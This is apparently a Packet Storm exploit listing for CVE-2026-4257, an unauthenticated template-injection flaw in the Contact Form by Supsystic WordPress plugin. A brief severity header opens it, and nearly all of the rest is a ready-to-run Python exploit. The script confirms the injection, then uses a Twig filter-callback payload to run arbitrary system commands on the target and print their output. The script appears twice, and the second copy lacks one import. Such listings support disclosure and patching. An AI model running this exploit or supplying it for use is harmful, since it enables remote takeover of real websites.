9.8
/ 10
CRITICAL
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Description
Contact Form by Supsystic versions 1.7.36 and below server-side template injection exploit that achieves remote code execution...
Basic Information
ID
PACKETSTORM:220753
Published
May 11, 2026 at 00:00
Affected Product
Affected Versions
import requests
import argparse
import re
import urllib.parse
def check_ssti(url, field_name):
print(f"[*] Testing SSTI on {url} with field {field_name}...")
# Simple arithmetic test
test_payload = "{{7*7}}"
params = {
"cfsPreFill": "1",
field_name: test_payload
}
target_url = f"{url}?{urllib.parse.urlencode(params)}"
try:
response = requests.get(target_url, verify=False, timeout=10)
if "49" in response.text:
print("[+] SSTI confirmed! Found '49' in response.")
return True
else:
print("[-] SSTI test failed. '49' not found in response.")
return False
except Exception as e:
print(f"[-] Error: {e}")
return False
def trigger_rce(url, field_name, command):
print(f"[*] Triggering RCE: {command}")
# Payload to register system as a filter callback and then call it
# We use forms.params.fields.1.value and fields.2.value to avoid quote escaping
# last_name will be 'system', email will be the command
payload = "{{_self.env.registerUndefinedFilterCallback(forms.params.fields.1.value)}}{{_self.env.getFilter(forms.params.fields.2.value)}}"
params = {
"cfsPreFill": "1",
field_name: payload,
"last_name": "system",
"email": command
}
target_url = f"{url}?{urllib.parse.urlencode(params)}"
try:
response = requests.get(target_url, verify=False, timeout=10)
print(f"[*] Response Status: {response.status_code}")
# Look for common patterns in the response that might indicate success
# The output usually appears in the 'value' attribute of the first field
match = re.search(r'name="fields\[' + field_name + r'\]" value="([^"]+)"', response.text)
if match:
print(f"[!] RCE SUCCESS! Output:")
print(f"----------------------------------------")
print(match.group(1))
print(f"----------------------------------------")
return True
else:
print("[-] Could not find command output in response. Check the response body manually.")
return False
except Exception as e:
print(f"[-] Error: {e}")
return False
if __name__ == "__main__":
print("""
CVE-2026-4257
Contact Form by Supsystic <= 1.7.36 - Unauthenticated Server-Side Template Injection via Prefill Functionality
-------------------------------------------------
""")
parser = argparse.ArgumentParser(description="PoC for CVE-2026-4257 (SSTI to RCE in Contact Form by Supsystic)")
parser.add_argument("-u", "--url", required=True, help="URL of the page with the form")
parser.add_argument("-f", "--field", required=True, help="Name of the form field (e.g., first_name)")
parser.add_argument("-c", "--cmd", default="whoami", help="Command to execute")
args = parser.parse_args()
if check_ssti(args.url, args.field):
trigger_rce(args.url, args.field, args.cmd)
import argparse
import re
import urllib.parse
def check_ssti(url, field_name):
print(f"[*] Testing SSTI on {url} with field {field_name}...")
# Simple arithmetic test
test_payload = "{{7*7}}"
params = {
"cfsPreFill": "1",
field_name: test_payload
}
target_url = f"{url}?{urllib.parse.urlencode(params)}"
try:
response = requests.get(target_url, verify=False, timeout=10)
if "49" in response.text:
print("[+] SSTI confirmed! Found '49' in response.")
return True
else:
print("[-] SSTI test failed. '49' not found in response.")
return False
except Exception as e:
print(f"[-] Error: {e}")
return False
def trigger_rce(url, field_name, command):
print(f"[*] Triggering RCE: {command}")
# Payload to register system as a filter callback and then call it
# We use forms.params.fields.1.value and fields.2.value to avoid quote escaping
# last_name will be 'system', email will be the command
payload = "{{_self.env.registerUndefinedFilterCallback(forms.params.fields.1.value)}}{{_self.env.getFilter(forms.params.fields.2.value)}}"
params = {
"cfsPreFill": "1",
field_name: payload,
"last_name": "system",
"email": command
}
target_url = f"{url}?{urllib.parse.urlencode(params)}"
try:
response = requests.get(target_url, verify=False, timeout=10)
print(f"[*] Response Status: {response.status_code}")
# Look for common patterns in the response that might indicate success
# The output usually appears in the 'value' attribute of the first field
match = re.search(r'name="fields\[' + field_name + r'\]" value="([^"]+)"', response.text)
if match:
print(f"[!] RCE SUCCESS! Output:")
print(f"----------------------------------------")
print(match.group(1))
print(f"----------------------------------------")
return True
else:
print("[-] Could not find command output in response. Check the response body manually.")
return False
except Exception as e:
print(f"[-] Error: {e}")
return False
if __name__ == "__main__":
print("""
CVE-2026-4257
Contact Form by Supsystic <= 1.7.36 - Unauthenticated Server-Side Template Injection via Prefill Functionality
-------------------------------------------------
""")
parser = argparse.ArgumentParser(description="PoC for CVE-2026-4257 (SSTI to RCE in Contact Form by Supsystic)")
parser.add_argument("-u", "--url", required=True, help="URL of the page with the form")
parser.add_argument("-f", "--field", required=True, help="Name of the form field (e.g., first_name)")
parser.add_argument("-c", "--cmd", default="whoami", help="Command to execute")
args = parser.parse_args()
if check_ssti(args.url, args.field):
trigger_rce(args.url, args.field, args.cmd)